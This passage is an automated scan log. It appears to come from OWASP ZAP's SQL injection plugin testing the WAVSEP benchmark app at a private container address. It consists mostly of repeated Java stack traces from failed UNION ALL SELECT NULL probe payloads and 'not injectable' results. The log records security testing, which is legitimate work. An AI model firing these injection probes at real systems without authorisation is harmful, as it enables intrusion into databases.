org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922738 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922739 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922741 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922742 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922743 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922744 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922745 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922747 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922747 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8922816 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8923348 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'username' is not injectable 8923768 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'password' is not injectable 8924066 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8925374 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8925584 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8926254 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8926705 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8927246 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8927797 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8928651 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8928977 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8929609 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8929615 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8930353 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8930878 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8931431 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8931522 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8932156 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8932237 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8932589 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8933149 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8933152 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8933732 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8934259 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8934750 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8934785 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8935109 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8935109 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8935115 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8935807 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8935809 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8936329 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8936330 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8936839 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8937127 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8937472 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8938049 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8938462 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8938744 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8939032 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8939445 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8939601 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8940137 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8940271 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8940579 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8941215 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8941760 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8942141 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8942160 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8943149 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8943199 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8944154 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8944259 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8944967 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8945013 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8945670 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8946077 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8946259 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8946733 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8947301 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8947546 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8947916 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8948441 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8949199 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8950627 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8951053 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8951502 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8952023 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8952148 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8953270 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8953974 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8954343 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8954477 [ZAP-ActiveScanner-1] 